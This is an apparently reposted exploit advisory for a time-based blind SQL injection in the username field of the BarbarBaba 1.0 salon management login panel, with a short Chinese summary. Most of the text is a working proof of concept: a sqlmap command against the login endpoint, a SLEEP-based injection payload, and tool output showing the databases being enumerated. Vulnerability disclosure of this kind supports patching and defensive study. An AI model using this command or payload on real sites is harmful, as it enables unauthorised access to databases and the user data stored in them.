BarbarBaba 1.0 time-based blind sql injection
BarbarBaba 1.0 存在时间盲注 SQL 注入漏洞,攻击者可通过 username 参数注入时间盲注 SQL 代码,利用 sqlmap 工具进行测试,导致 MySQL 数据库响应延迟,并成功恢复 information_schema 和 barber_baba 数据库。 2025-9-4 21:36:22 Author: cxsecurity.com(查看原文) 阅读量:9 收藏

********************************************************* #Exploit Title: BarbarBaba 1.0 time-based blind sql injection #Date: 03.09.2025 #Exploit Author: Furkan Sezgin #Category: webapps Tested on: windows, kali linux, firefox # Software Link: https://www.sourcecodester.com/php/18171/best-salon-management-system-project-php.html PoC: sqlmap -u "http://localhost/barbarbaba/barbarbaba/panel/" --data="username=%27&password=%27&g-recaptcha-response=&login=Sign+In" --dbs sqlmap resumed the following injection point(s) from stored session: --- Parameter: username (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: username=' AND (SELECT 3362 FROM (SELECT(SLEEP(5)))ZtPO)-- zSBs&password='&g-recaptcha-response=&login=Sign In --- [16:21:24] [INFO] the back-end DBMS is MySQL web application technology: PHP, Apache 2.4.58, PHP 8.2.12 back-end DBMS: MySQL >= 5.0.12 (MariaDB fork) [16:21:24] [INFO] resumed: information_schema [16:21:24] [INFO] resumed: barber_baba *********************************************************



 

Thanks for you comment!
Your message is in quarantine 48 hours.


文章来源: https://cxsecurity.com/issue/WLB-2025090001
如有侵权请联系:admin#unsafe.sh